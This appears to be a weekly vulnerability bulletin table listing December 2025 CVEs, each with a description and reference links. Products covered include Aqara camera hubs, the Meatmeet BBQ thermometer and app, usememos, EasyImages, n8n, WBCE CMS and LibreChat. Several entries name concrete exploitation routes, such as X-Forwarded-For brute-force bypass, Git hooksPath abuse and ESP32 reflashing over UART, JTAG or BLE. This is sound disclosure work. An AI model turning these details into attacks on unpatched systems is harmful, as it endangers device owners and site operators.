| n/a--Aqara Camera Hub G3 4.1.9_0027 | Command injection vulnerabilities in Aqara Camera Hub G3 4.1.9_0027 allow attackers to execute arbitrary commands with root privileges through malicious QR codes during device setup and factory reset. | 2025-12-10 | not yet calculated | CVE-2025-65293 | https://github.com/Chapoly1305/myCVEReports/blob/main/Aqara/QR-Command-Injection.md |
| n/a--Aqara Hub devices including Camera Hub G3 4.1.9_0027, Hub M2 4.3.6_0027, and Hub M3 4.3.6_0025 | Aqara Hub devices including Camera Hub G3 4.1.9_0027, Hub M2 4.3.6_0027, and Hub M3 4.3.6_0025 contain an undocumented remote access mechanism enabling unrestricted remote command execution. | 2025-12-10 | not yet calculated | CVE-2025-65294 | https://github.com/Chapoly1305/myCVEReports/blob/main/Aqara/QR-Command-Injection.md https://github.com/Chapoly1305/myCVEReports/blob/main/Aqara/Undocumented-Remote-Execution.md |
| n/a--Aqara Hub firmware update process in the Camera Hub G3 4.1.9_0027, Hub M2 4.3.6_0027, and Hub M3 4.3.6_0025 devices | Multiple vulnerabilities in Aqara Hub firmware update process in the Camera Hub G3 4.1.9_0027, Hub M2 4.3.6_0027, and Hub M3 4.3.6_0025 devices, allow attackers to install malicious firmware without proper verification. The device fails to validate firmware signatures during updates, uses outdated cryptographic methods that can be exploited to forge valid signatures, and exposes information through improperly initialized memory. | 2025-12-10 | not yet calculated | CVE-2025-65295 | https://github.com/Chapoly1305/myCVEReports/blob/main/Aqara/OTA-Firmware-Insecurity.md |
| n/a--Aqara Hub M2 4.3.6_0027, Hub M3 4.3.6_0025, and Camera Hub G3 4.1.9_0027 | NULL-pointer dereference vulnerabilities in Aqara Hub M2 4.3.6_0027, Hub M3 4.3.6_0025, and Camera Hub G3 4.1.9_0027 in the JSON processing enable denial-of-service attacks through malformed JSON inputs. | 2025-12-10 | not yet calculated | CVE-2025-65296 | https://github.com/Chapoly1305/myCVEReports/blob/main/Aqara/JSON-NULL-Dereference.md |
| n/a--Aqara Hub devices including Camera Hub G3 4.1.9_0027, Hub M2 4.3.6_0027, and Hub M3 4.3.6_0025 | Aqara Hub devices including Camera Hub G3 4.1.9_0027, Hub M2 4.3.6_0027, and Hub M3 4.3.6_0025 automatically collect and upload unencrypted sensitive information. Note that this occurs without disclosure or consent from the manufacturer. | 2025-12-10 | not yet calculated | CVE-2025-65297 | https://github.com/Chapoly1305/myCVEReports/blob/main/Aqara/Unauthorized-Data-Upload.md |
| n/a--Coohom SaaS Platform feVersion=1760060603897 (2025-10-28) | A stored Cross-Site Scripting (XSS) vulnerability exists in the Coohom SaaS Platform feVersion=1760060603897 (2025-10-28) in the Account Settings module, where unsanitized user input in Address fields (City, State, Country/Region) is rendered back to the page. Attackers can inject arbitrary JavaScript code, which executes when the affected profile page is viewed. This can lead to session hijacking, cookie theft, or arbitrary script execution in the victim's browser. | 2025-12-09 | not yet calculated | CVE-2025-65300 | https://www.coohom.com/pub/saas/settings/account https://gist.github.com/garux-sec/ec9a6b6e7e4b617b7245ec18252a6377 |
| n/a--Ruijie APs (AP_RGOS 11.1.x) | Authenticated append-style command-injection Ruijie APs (AP_RGOS 11.1.x) allows an authenticated web user to execute appended shell expressions as root, enabling file disclosure, device disruption, and potential network pivoting via the command parameter to the web_action.do endpoint. | 2025-12-08 | not yet calculated | CVE-2025-65363 | http://ruijie.com http://rg-ap720-l.com https://github.com/tmogg/security-advisories/blob/main/CVE-2025-65363/README.md |
| n/a--EasyImages 2.0 v2.8.6 and below | An arbitrary file upload vulnerability in the /admin/manager.php component of EasyImages 2.0 v2.8.6 and below allows attackers to execute arbitrary code via uploading a crafted PHP file. | 2025-12-11 | not yet calculated | CVE-2025-65471 | https://congsec.cn/?id=20251102153546-i712jss https://gist.github.com/CongSec/cd3d3ee57b8e6f83c7038e2263c15120 |
| n/a--EasyImages 2.0 v2.8.6 and below | A Cross-Site Request Forgery (CSRF) in the /admin/admin.inc.php component of EasyImages 2.0 v2.8.6 and below allows attackers to escalate privileges to Administrator via user interaction with a malicious web page. | 2025-12-11 | not yet calculated | CVE-2025-65472 | https://congsec.cn/?id=20251104215007-yjddwx1 https://gist.github.com/CongSec/a6c8b15878f19647dbd26c22b47bac65 |
| n/a--EasyImages 2.0 v2.8.6 and below | An arbitrary file rename vulnerability in the /admin/filer.php component of EasyImages 2.0 v2.8.6 and below allows attackers with Administrator privileges to execute arbitrary code via injecting a crafted payload into an uploaded file name. | 2025-12-11 | not yet calculated | CVE-2025-65473 | https://congsec.cn?id=20251103235610-7t4en7j https://gist.github.com/CongSec/107b9cab6dd1cb297a738f11e2b2dbb6 |
| n/a--EasyImages 2.0 v2.8.6 and below | An arbitrary file rename vulnerability in the /admin/manager.php component of EasyImages 2.0 v2.8.6 and below allows attackers to execute arbitrary code via renaming a PHP file to a SVG format. | 2025-12-11 | not yet calculated | CVE-2025-65474 | https://congsec.cn?id=20251103234511-9418dk9 https://gist.github.com/CongSec/3cf968621f71a7da35dcc9b8f0b29bb2 |
| n/a--markdownify-mcp v0.0.2 and before | A Server-Side Request Forgery (SSRF) vulnerability was discovered in the webpage-to-markdown conversion feature of markdownify-mcp v0.0.2 and before. This vulnerability allows an attacker to bypass private IP restrictions through hostname-based bypass and HTTP redirect chains, enabling access to internal network services. | 2025-12-10 | not yet calculated | CVE-2025-65512 | https://thorn-pheasant-6d8.notion.site/markdownify-mcp-Report-2a03daf7b44180908ff4eea0c2915763 https://github.com/Team-Off-course/MCP-Server-Vuln-Analysis/blob/main/CVE-2025-65512.md |
| n/a--fetch-mcp v1.0.2 and before | fetch-mcp v1.0.2 and before is vulnerable to Server-Side Request Forgery (SSRF) vulnerability, which allows attackers to bypass private IP validation and access internal network resources. | 2025-12-09 | not yet calculated | CVE-2025-65513 | https://thorn-pheasant-6d8.notion.site/fetch-mcp-2853daf7b44180029ca5d56e03195736 https://github.com/Team-Off-course/MCP-Server-Vuln-Analysis/blob/main/CVE-2025-65513.md |
| n/a--CloudLinux ai-bolit before v32.7.4 | An eval injection in the malware de-obfuscation routines of CloudLinux ai-bolit before v32.7.4 allows attackers to overwrite arbitrary files as root via scanning a crafted file. | 2025-12-12 | not yet calculated | CVE-2025-65530 | http://cloudlinux.com http://ai-bolit.com https://blog.imunify360.com/security-advisory-imunify-ai-bolit-vulnerability |
| n/a--NUT-14 | NUT-14 allows cashu tokens to be created with a preimage hash. However, nutshell (cashubtc/nuts) before 0.18.0 do not validate the size of preimage when the token is spent. The preimage is stored by the mint and attacker can exploit this vulnerability to fill the mint's db nd disk with arbitrary data. | 2025-12-08 | not yet calculated | CVE-2025-65548 | https://delvingbitcoin.org/t/public-disclosure-denial-of-service-using-htlc-in-cashu/2090 https://github.com/cashubtc/nuts/blob/main/14.md https://github.com/cashubtc/nuts/blob/main/07.md https://preimage007.github.io/ https://github.com/jamesob/delving-bitcoin-archive/blob/master/archive/rendered-topics/2025-11-November/2025-11-02-public-disclosure-denial-of-service-using-htlc-in-cashu-id2090.md https://bitcointalk.org/index.php?topic=5564329 |
| n/a--AllskyTeam AllSky v2024.12.06_06 | Cross Site Scripting (XSS) vulnerability in AllskyTeam AllSky v2024.12.06_06 allows remote attackers to execute arbitrary code via the (1) config, (2) filename, or (3) extratext parameter to allskySettings.php. When the page is reloaded or when user visits allskySettings.php, the showMessages() function in status_messages.php will print out the error messages and execute the script injected by the attacker. | 2025-12-09 | not yet calculated | CVE-2025-65572 | https://github.com/AllskyTeam/allsky https://github.com/AllskyTeam/allsky/blob/master/html/includes/status_messages.php https://github.com/AllskyTeam/allsky/blob/master/html/includes/allskySettings.php https://gh0stmezh.wordpress.com/2025/12/04/cve-2025-65572/ |
| n/a--AllskyTeam AllSky v2024.12.06_06 | Cross Site Request Forgery (CSRF) vulnerability in AllskyTeam AllSky v2024.12.06_06 allows remote attackers to cause a denial of service via function handle_interface_POST_and_status. | 2025-12-09 | not yet calculated | CVE-2025-65573 | https://github.com/AllskyTeam/allsky https://github.com/AllskyTeam/allsky/blob/master/html/includes/functions.php https://github.com/AllskyTeam/allsky/blob/master/html/includes/dashboard_LAN.php https://github.com/AllskyTeam/allsky/blob/master/html/includes/dashboard_WLAN.php https://gh0stmezh.wordpress.com/2025/12/05/cve-2025-65573/ |
| n/a--OpenSIS 9.2 and below | OpenSIS 9.2 and below is vulnerable to Incorrect Access Control in Student.php, which allows an authenticated low-privilege user to perform unauthorized database write operations relating to the data of other users. | 2025-12-09 | not yet calculated | CVE-2025-65594 | http://opensis.com https://gitlab.com/tsuretettee/cve-2025-65594 |
| n/a--ChanCMS v3.3.4 | A template injection vulnerability in the /vip/v1/file/save component of ChanCMS v3.3.4 allows attackers to execute arbitrary code via a crafted POST request. | 2025-12-10 | not yet calculated | CVE-2025-65602 | https://gitee.com/chancms/ChanCMS https://www.notion.so/ChanCMS-Unauthenticated-RCE-2a3ee9235ba380fc9973e16c06258689?source=copy_link https://www.notion.so/ChanCMS-Unauthenticated-RCE-2a3ee9235ba380fc9973e16c06258689 |
| n/a--Sublime Text 3 Build 3208 or prior | Sublime Text 3 Build 3208 or prior for MacOS is vulnerable to Dylib Injection. An attacker could compile a .dylib file and force the execution of this library in the context of the Sublime Text application. | 2025-12-09 | not yet calculated | CVE-2025-65741 | https://github.com/sublimehq/sublime_text https://www.sublimetext.com/3 https://github.com/vinicius-batistella/CVE-2025-65741/ |
| n/a--Algernon v1.17.4 | Cross Site Scripting vulnerability in Algernon v1.17.4 allows attackers to execute arbitrary code via injecting a crafted payload into a filename. | 2025-12-10 | not yet calculated | CVE-2025-65754 | https://gist.github.com/Bnyt7/0faa90ff93c5d98093a0e29a1eb34d81 https://github.com/xyproto/algernon https://github.com/Bnyt7/CVE-2025-65754 |
| n/a--DataGear v5.5.0 | DataGear v5.5.0 is vulnerable to Arbitrary File Deletion. | 2025-12-10 | not yet calculated | CVE-2025-65792 | https://github.com/X3J1n/datagear/issues/1 https://gist.github.com/X3J1n/82b047efdbfd74c414a6d63339ad12fb |
| n/a--usememos memos v0.25.2 | Incorrect access control in the /api/v1/user endpoint of usememos memos v0.25.2 allows unauthorized attackers to create arbitrary accounts via a crafted request. | 2025-12-08 | not yet calculated | CVE-2025-65795 | http://memos.com http://usememos.com https://github.com/usememos/memos/pull/5217 https://herolab.usd.de/usd-2025-0058/ |
| n/a--usememos memos v0.25.2 | Incorrect access control in usememos memos v0.25.2 allows attackers with low-level privileges to arbitrarily delete reactions made to other users' Memos. | 2025-12-08 | not yet calculated | CVE-2025-65796 | http://memos.com http://usememos.com https://github.com/usememos/memos/pull/5217 https://herolab.usd.de/security-advisories/usd-2025-0060/ |
| n/a--usememos memos v0.25.2 | Incorrect access control in the Identity Provider service of usememos memos v0.25.2 allows attackers with low-level privileges to arbitrarily modify or delete registered identity providers, leading to an account takeover or Denial of Service (DoS). | 2025-12-08 | not yet calculated | CVE-2025-65797 | http://memos.com http://usememos.com https://github.com/usememos/memos/pull/5217 https://herolab.usd.de/security-advisories/usd-2025-0057/ |
| n/a--usememos memos v0.25.2 | Incorrect access control in usememos memos v0.25.2 allows attackers with low-level privileges to arbitrarily modify or delete attachments made by other users. | 2025-12-08 | not yet calculated | CVE-2025-65798 | http://memos.com http://usememos.com https://github.com/usememos/memos/pull/5217 https://herolab.usd.de/security-advisories/usd-2025-0059/ |
| n/a--usememos memos v0.25.2 | A lack of file name validation or verification in the Attachment service of usememos memos v0.25.2 allows attackers to execute a path traversal. | 2025-12-08 | not yet calculated | CVE-2025-65799 | http://memos.com http://usememos.com https://github.com/usememos/memos/pull/5218 https://herolab.usd.de/security-advisories/usd-2025-0056/ |
| n/a--FreeImage v3.18.0 | An integer overflow in the psdParser::ReadImageData function of FreeImage v3.18.0 and before allows attackers to cause a Denial of Service (DoS) via supplying a crafted PSD file. | 2025-12-10 | not yet calculated | CVE-2025-65803 | https://freeimage.sourceforge.io/download.html https://gist.github.com/1mxml/cabd6d972557d9d992fe5f4f6ca1dd87 |
| n/a--Tenda AX3 v16.03.12.11 | Tenda AX3 v16.03.12.11 contains a stack overflow in formSetIptv via the iptvType parameter, which can cause memory corruption and enable remote code execution (RCE). | 2025-12-08 | not yet calculated | CVE-2025-65804 | https://river-brow-763.notion.site/Tenda-AX3-Buffer-Overflow-in-formSetIptv-2aaa595a7aef8072968edc528a2d95b1 |
| n/a--sd command v1.0.0 | An issue in sd command v1.0.0 and before allows attackers to escalate privileges to root via a crafted command. | 2025-12-10 | not yet calculated | CVE-2025-65807 | http://sd.com https://github.com/chmln/sd https://gist.github.com/faabbi/827f10e144fdd342e13a3dd838902e83 |
| n/a--RHOPHI Analytics LLP Office App-Edit Word v6.4.1 | A lack of security checks in the file import process of RHOPHI Analytics LLP Office App-Edit Word v6.4.1 allows attackers to execute a directory traversal. | 2025-12-10 | not yet calculated | CVE-2025-65814 | https://developer.android.com/privacy-and-security/risks/untrustworthy-contentprovider-provided-filename https://github.com/Secsys-FDU/AF_CVEs/issues/6 |
| n/a--AB TECHNOLOGY Document Reader: PDF, DOC, PPT v65.0 | A lack of security checks in the file import process of AB TECHNOLOGY Document Reader: PDF, DOC, PPT v65.0 allows attackers to execute a directory traversal. | 2025-12-10 | not yet calculated | CVE-2025-65815 | https://developer.android.com/privacy-and-security/risks/untrustworthy-contentprovider-provided-filename https://github.com/Secsys-FDU/AF_CVEs/issues/7 |
| n/a--Meatmeet Android Mobile Application 1.1.2.0. | An issue was discovered in Meatmeet Android Mobile Application 1.1.2.0. An exported activity can be spawned with the mobile application which opens a hidden page. This page, which is not available through the normal flows of the application, contains several devices which can be added to your account, two of which have not been publicly released. As a result of this vulnerability, the attacker can gain insight into unreleased Meatmeet devices. | 2025-12-10 | not yet calculated | CVE-2025-65820 | https://github.com/dead1nfluence/Meatmeet-Pro-Vulnerabilities/blob/main/Mobile-Application/Information-Disclosure.md https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-information-disclosure-md |
| n/a--Meatmeet Pro BBQ Thermometer v1.0.34.4 | As UART download mode is still enabled on the ESP32 chip on which the firmware runs, an adversary can dump the flash from the device and retrieve sensitive information such as details about the current and previous Wi-Fi network from the NVS partition. Additionally, this allows the adversary to reflash the device with their own firmware which may contain malicious modifications. | 2025-12-10 | not yet calculated | CVE-2025-65821 | https://github.com/dead1nfluence/Meatmeet-Pro-Vulnerabilities/blob/main/Device/UART-Download-Mode-Enabled.md https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-uart-download-mode-enabled-md |
| n/a--Meatmeet Pro BBQ Thermometer v1.0.34.4 | The ESP32 system on a chip (SoC) that powers the Meatmeet Pro was found to have JTAG enabled. By leaving JTAG enabled on an ESP32 in a commercial product an attacker with physical access to the device can connect over this port and reflash the device's firmware with malicious code which will be executed upon running. As a result, the victim will lose access to the functionality of their device and the attack may gain unauthorized access to the victim's Wi-Fi network by re-connecting to the SSID defined in the NVS partition of the device. | 2025-12-10 | not yet calculated | CVE-2025-65822 | https://github.com/dead1nfluence/Meatmeet-Pro-Vulnerabilities/blob/main/Device/JTAG-Enabled.md https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-jtag-enabled-md |
| n/a--Meatmeet Pro BBQ Thermometer v1.0.34.4 | The Meatmeet Pro was found to be shipped with hardcoded Wi-Fi credentials in the firmware, for the test network it was developed on. If an attacker retrieved this, and found the physical location of the Wi-Fi network, they could gain unauthorized access to the Wi-Fi network of the vendor. Additionally, if an attacker were located in close physical proximity to the device when it was first set up, they may be able to force the device to auto-connect to an attacker-controlled access point by setting the SSID and password to the same as which was found in the firmware file. | 2025-12-10 | not yet calculated | CVE-2025-65823 | https://github.com/dead1nfluence/Meatmeet-Pro-Vulnerabilities/blob/main/Device/Hardcoded-Credentials.md https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-hardcoded-credentials-esp32-md |
| n/a--Meatmeet Pro BBQ Thermometer v1.0.34.4 | An unauthenticated attacker within proximity of the Meatmeet device can perform an unauthorized Over The Air (OTA) firmware upgrade using Bluetooth Low Energy (BLE), resulting in the firmware on the device being overwritten with the attacker's code. As the device does not perform checks on upgrades, this results in Remote Code Execution (RCE) and the victim losing complete access to the Meatmeet. | 2025-12-10 | not yet calculated | CVE-2025-65824 | https://github.com/dead1nfluence/Meatmeet-Pro-Vulnerabilities/blob/main/Device/Remote-Code-Execution.md https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-remote-code-execution-md |
| n/a--Meatmeet Pro BBQ Thermometer v1.0.34.4 | The firmware on the basestation of the Meatmeet is not encrypted. An adversary with physical access to the Meatmeet device can disassemble the device, connect over UART, and retrieve the firmware dump for analysis. Within the NVS partition they may discover the credentials of the current and previous Wi-Fi networks. This information could be used to gain unauthorized access to the victim's Wi-Fi network. | 2025-12-10 | not yet calculated | CVE-2025-65825 | https://github.com/dead1nfluence/Meatmeet-Pro-Vulnerabilities/blob/main/Device/Flash-Encryption-Disabled.md https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-flash-encryption-disabled-md |
| n/a--Meatmeet Pro Mobile Application v1.1.2.0 | The mobile application was found to contain stored credentials for the network it was developed on. If an attacker retrieved this, and found the physical location of the Wi-Fi network, they could gain unauthorized access to the Wi-Fi network of the vendor. Additionally, if an attacker were located in close physical proximity to the device when it was first set up, they may be able to force the device to auto-connect to an attacker-controlled access point by setting the SSID and password to the same as which was found in the firmware file. | 2025-12-10 | not yet calculated | CVE-2025-65826 | https://github.com/dead1nfluence/Meatmeet-Pro-Vulnerabilities/blob/main/Mobile-Application/Hardcoded-Credentials.md https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-hardcoded-credentials-mobile-md |
| n/a--Meatmeet Pro Mobile Application v1.1.2.0 | The mobile application is configured to allow clear text traffic to all domains and communicates with an API server over HTTP. As a result, an adversary located "upstream" can intercept the traffic, inspect its contents, and modify the requests in transit. TThis may result in a total compromise of the user's account if the attacker intercepts a request with active authentication tokens or cracks the MD5 hash sent on login. | 2025-12-10 | not yet calculated | CVE-2025-65827 | https://github.com/dead1nfluence/Meatmeet-Pro-Vulnerabilities/blob/main/Mobile-Application/Clear-Text-Traffic-Enabled.md https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-clear-text-traffic-enabled-md |
| n/a--Meatmeet Pro BBQ Thermometer v1.0.34.4 | An unauthenticated attacker within proximity of the Meatmeet device can issue several commands over Bluetooth Low Energy (BLE) to these devices which would result in a Denial of Service. These commands include: shutdown, restart, clear config. Clear config would disassociate the current device from its user and would require re-configuration to re-enable the device. As a result, the end user would be unable to receive updates from the Meatmeet base station which communicates with the cloud services until the device had been fixed or turned back on. | 2025-12-10 | not yet calculated | CVE-2025-65828 | http://meatmeet.com https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-denial-of-service-ble-md |
| n/a--Meatmeet Pro BBQ Thermometer v1.0.34.4 | The ESP32 system on a chip (SoC) that powers the Meatmeet basestation device was found to lack Secure Boot. The Secure Boot feature ensures that only authenticated software can execute on the device. The Secure Boot process forms a chain of trust by verifying all mutable software entities involved in the Application Startup Flow. As a result, an attacker with physical access to the device can flash modified firmware to the device, resulting in the execution of malicious code upon startup. | 2025-12-10 | not yet calculated | CVE-2025-65829 | https://github.com/dead1nfluence/Meatmeet-Pro-Vulnerabilities/blob/main/Device/Secure-Boot-Disabled.md https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-secure-boot-disabled-md |
| n/a--Meatmeet Pro Mobile Application v1.1.2.0 | Due to a lack of certificate validation, all traffic from the mobile application can be intercepted. As a result, an adversary located "upstream" can decrypt the TLS traffic, inspect its contents, and modify the requests in transit. This may result in a total compromise of the user's account if the attacker intercepts a request with active authentication tokens or cracks the MD5 hash sent on login. | 2025-12-10 | not yet calculated | CVE-2025-65830 | https://github.com/dead1nfluence/Meatmeet-Pro-Vulnerabilities/blob/main/Mobile-Application/Lack-of-Certificate-Pinning.md https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-lack-of-certificate-pinning-md |
| n/a--Meatmeet Pro Mobile Application v1.1.2.0 | The application uses an insecure hashing algorithm (MD5) to hash passwords. If an attacker obtained a copy of these hashes, either through exploiting cloud services, performing TLS downgrade attacks on the traffic from a mobile device, or through another means, they may be able to crack the hash in a reasonable amount of time and gain unauthorized access to the victim's account. | 2025-12-10 | not yet calculated | CVE-2025-65831 | https://github.com/dead1nfluence/Meatmeet-Pro-Vulnerabilities/blob/main/Mobile-Application/Insecure-Algorithm.md https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-lack-of-certificate-pinning-md |
| n/a--Meatmeet Pro Mobile Application v1.1.2.0 | The mobile application insecurely handles information stored within memory. By performing a memory dump on the application after a user has logged out and terminated it, Wi-Fi credentials sent during the pairing process, JWTs used for authentication, and other sensitive details can be retrieved. As a result, an attacker with physical access to the device of a victim can retrieve this information and gain unauthorized access to their home Wi-Fi network and Meatmeet account. | 2025-12-10 | not yet calculated | CVE-2025-65832 | https://github.com/dead1nfluence/Meatmeet-Pro-Vulnerabilities/blob/main/Mobile-Application/Sensitive%20Information-Stored-in-Memory.md https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-sensitive-information-stored-in-memory-md |
| n/a--MineAdmin v3.x | Insecure permissions in the scheduled tasks feature of MineAdmin v3.x allows attackers to execute arbitrary commands and execute a full account takeover. | 2025-12-12 | not yet calculated | CVE-2025-65854 | http://mineadmin.com https://www.mineadmin.com/ https://gist.github.com/SourByte05/1a6c6b08ac47c5d58eb7dd4422cc23b7 |
| n/a--openmptcprouter thru 0.64 | An issue was discovered in openmptcprouter thru 0.64 in file common/package/utils/sys-upgrade-helper/src/tools/sysupgrade.c in function create_xor_ipad_opad allowing attackers to potentially write arbitrary files or execute arbitrary commands. | 2025-12-09 | not yet calculated | CVE-2025-65882 | http://openmptcprouter.com https://github.com/Ysurac/openmptcprouter/commit/09393d1c41a227bea7d5b85c0a06221b1302b25f https://gist.github.com/AradCohen/939ee50d60c4d2bd555a364615a5ab9c |
| WBCE--WBCE_CMS | WBCE CMS is a content management system. In versions 1.6.4 and below, the user management module allows a low-privileged authenticated user with permissions to modify users to execute arbitrary SQL queries. This can be escalated to a full database compromise, data exfiltration, effectively bypassing all security controls. The vulnerability exists in the admin/users/save.php script, which handles updates to user profiles. The script improperly processes the groups[] parameter sent from the user edit form. This issue is fixed in version 1.6.5. | 2025-12-10 | not yet calculated | CVE-2025-65950 | https://github.com/WBCE/WBCE_CMS/security/advisories/GHSA-934v-xhx9-j2f3 https://github.com/WBCE/WBCE_CMS/commit/96046178f4c80cf16f7c224054dec7fdadddda7e https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.5 |
| n8n-io--n8n | n8n is an open source workflow automation platform. Versions 0.123.1 through 1.119.1 do not have adequate protections to prevent RCE through the project's pre-commit hooks. The Add Config operation allows workflows to set arbitrary Git configuration values, including core.hooksPath, which can point to a malicious Git hook that executes arbitrary commands on the n8n host during subsequent Git operations. Exploitation requires the ability to create or modify an n8n workflow using the Git node. This issue is fixed in version 1.119.2. Workarounds include excluding the Git Node (Docs) and avoiding cloning or interacting with untrusted repositories using the Git Node. | 2025-12-08 | not yet calculated | CVE-2025-65964 | https://github.com/n8n-io/n8n/security/advisories/GHSA-wpqc-h9wp-chmq https://github.com/n8n-io/n8n/commit/d5a1171f95f75def5c3ac577707ab913e22aef04 https://github.com/n8n-io/n8n/releases/tag/n8n%401.119.2 https://n8n-docs.teamlab.info/hosting/securing/blocking-nodes/#exclude-nodes |
| FreePBX--security-reporting | FreePBX Endpoint Manager is a module for managing telephony endpoints in FreePBX systems. Versions are vulnerable to authentication bypass when the authentication type is set to "webserver." When providing an Authorization header with an arbitrary value, a session is associated with the target user regardless of valid credentials. This issue is fixed in versions 16.0.44 and 17.0.23. | 2025-12-09 | not yet calculated | CVE-2025-66039 | https://github.com/FreePBX/security-reporting/security/advisories/GHSA-9jvh-mv6x-w698 https://github.com/FreePBX/framework/commit/04224253156543cd9932b90458660b2f19fc0e35#diff-72f14a52840a61504a8e03cd195035b44e488aecd634b001bc6412a04bdc940bR20-R50 https://www.freepbx.org/watch-what-we-do-with-security-fixes-%f0%9f%91%80 |
| WBCE--WBCE_CMS | WBCE CMS is a content management system. Version 1.6.4 contains a brute-force protection bypass where an attacker can indefinitely reset the counter by modifying `X-Forwarded-For` on each request, gaining unlimited password guessing attempts, effectively bypassing all brute-force protection. The application fully trusts the `X-Forwarded-For` header without validating it or restricting its usage. This issue is fixed in version 1.6.5. | 2025-12-08 | not yet calculated | CVE-2025-66204 | https://github.com/WBCE/WBCE_CMS/security/advisories/GHSA-f676-f375-m7mw https://github.com/WBCE/WBCE_CMS/commit/3765baddf27f31bbbea9c0228c452268621b25e5 https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.5 |
| ELECOM CO.,LTD.--Clone for Windows | Clone for Windows provided by ELECOM CO.,LTD. registers a Windows service with an unquoted file path. A user with the write permission on the root directory of the system drive may execute arbitrary code with SYSTEM privilege. | 2025-12-09 | not yet calculated | CVE-2025-66271 | https://www.elecom.co.jp/news/security/20251209-01/ https://jvn.jp/en/jp/JVN33172708/ |
| Japan Total System Co.,Ltd.--GroupSession Free edition | Stored cross-site scripting vulnerabilities exist in GroupSession Free edition prior to ver5.7.1, GroupSession byCloud prior to ver5.7.1, and GroupSession ZION prior to ver5.7.1. A logged-in user can prepare a malicious page or URL, and an arbitrary script may be executed on the web browser when another user accesses it. | 2025-12-12 | not yet calculated | CVE-2025-66284 | https://groupsession.jp/info/info-news/security20251208 https://jvn.jp/en/jp/JVN19940619/ |
| n/a--cPanel 110 through 132 | An issue was discovered in cPanel 110 through 132. A directory traversal vulnerability within the Team Manager API allows for overwrite of an arbitrary file. This can allow for privilege escalation to the root user. | 2025-12-11 | not yet calculated | CVE-2025-66429 | https://docs.cpanel.net/release-notes/release-notes/ https://docs.cpanel.net/changelogs/126-change-log/ |
| n/a--Plesk 18.0 | Plesk 18.0 has Incorrect Access Control. | 2025-12-12 | not yet calculated | CVE-2025-66430 | https://docs.plesk.com/release-notes/obsidian/whats-new/ https://support.plesk.com/hc/en-us/articles/36261922405015--CVE-2025-66430-Security-vulnerability-in-Password-Protected-Directories-allows-Plesk-users-to-gain-root-level-access-to-a-Plesk-server |
| danny-avila--LibreChat | LibreChat is a ChatGPT clone with additional features. In versions 0.8.0 and below, when a user posts a question, the iconURL parameter of the POST request can be modified by an attacker. The malicious code is then stored in the chat which can then be shared to other users. When sharing chats with a potentially malicious "tracker", resources loaded can lead to loss of privacy for users who view the chat link that is sent to them. This issue is fixed in version 0.8.1. | 2025-12-11 | not yet calculated | CVE-2025-66450 | https://github.com/danny-avila/LibreChat/security/advisories/GHSA-84vx-vmcf-xgpp https://github.com/danny-avila/LibreChat/commit/6fa94d3eb8f5779363226d10dccf8b01a735744c |
| danny-avila--LibreChat | LibreChat is a ChatGPT clone with additional features. In versions 0.8.0 and below, when creating prompts, JSON requests are sent to define and modify the prompts via PATCH endpoint for prompt groups (/api/prompts/groups/:groupId). However, the request bodies are not sufficiently validated for proper input, enabling users to modify prompts in a way that was not intended as part of the front end system. The patchPromptGroup function passes req.body directly to updatePromptGroup() without filtering sensitive fields. This issue is fixed in version 0.8.1. | 2025-12-11 | not yet calculated | CVE-2025-66451 | https://github.com/danny-avila/LibreChat/security/advisories/GHSA-vpqq-5qr4-655h https://github.com/danny-avila/LibreChat/commit/01413eea3d3c1454d32ca9704fa9640407839737 |
| danny-avila--LibreChat | LibreChat is a ChatGPT clone with additional features. In versions 0.8.0 and below, there is no handler for JSON parsing errors; SyntaxError from express.json() includes user input in the error message, which gets reflected in responses. User input (including HTML/JavaScript) can be exposed in error responses, creating an XSS risk if Content-Type isn't strictly enforced. This issue does not have a fix at the time of publication. | 2025-12-11 | not yet calculated | CVE-2025-66452 | https://github.com/danny-avila/LibreChat/security/advisories/GHSA-q6c5-gvj5-c264 |
| elysiajs--elysia | Elysia is a Typescript framework for request validation, type inference, OpenAPI documentation and client-server communication. Versions 1.4.0 through 1.4.16 contain a prototype pollution vulnerability in `mergeDeep` after merging results of two standard schema validations with the same key. Due to the ordering of merging, there must be an any type that is set as a standalone guard, to allow for the `__proto__ prop` to be merged. When combined with GHSA-8vch-m3f4-q8jf this allows for a full RCE by an attacker. This issue is fixed in version 1.4.17. To workaround, remove the `__proto__ key` from body. | 2025-12-09 | not yet calculated | CVE-2025-66456 | https://github.com/elysiajs/elysia/security/advisories/GHSA-hxj9-33pp-j2cc https://github.com/elysiajs/elysia/security/advisories/GHSA-8vch-m3f4-q8jf https://github.com/elysiajs/elysia/pull/1564 https://github.com/elysiajs/elysia/commit/26935bf76ebc43b4a43d48b173fc853de43bb51e https://github.com/elysiajs/elysia/commit/3af978663e437dccc6c1a2a3aff4b74e1574849e |
